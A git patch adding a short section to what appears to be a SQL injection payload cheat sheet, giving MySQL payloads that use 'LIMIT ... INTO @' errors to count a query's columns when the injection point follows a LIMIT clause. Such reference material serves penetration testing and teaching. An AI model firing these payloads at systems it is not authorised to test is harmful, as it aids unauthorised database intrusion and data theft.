From 614e8a97b9acf59ebd9e265fad488e43b714bfa5 Mon Sep 17 00:00:00 2001
From: nizam0906 <nizamudheenak8@gmail.com>
Date: Tue, 29 Oct 2019 16:48:11 +0530
Subject: [PATCH] Updated Detect columns number

Detect columns number using LIMIT INTO Error Based
---
 SQL Injection/MySQL Injection.md | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index 979aa8b..783d913 100644
--- a/SQL Injection/MySQL Injection.md	
+++ b/SQL Injection/MySQL Injection.md	
@@ -95,6 +95,16 @@ This method works if error showing is enabled
 1' UNION SELECT @,@,@--+    #No error means query uses 3 column
                             #-1' UNION SELECT 1,2,3--+	True
 ```
+#### using `LIMIT INTO` Error Based
+This method works if error showing is enabled.
+
+It is useful for finding the number of columns when the injection point is after a LIMIT clause.
+```sql
+1' LIMIT 1,1 INTO @--+        #The used SELECT statements have a different number of columns
+1' LIMIT 1,1 INTO @,@--+      #The used SELECT statements have a different number of columns
+1' LIMIT 1,1 INTO @,@,@--+    #No error means query uses 3 column
+                              #-1' UNION SELECT 1,2,3--+	True
+```
 ### Extract database with information_schema
 
 Then the following codes will extract the databases'name, tables'name, columns'name.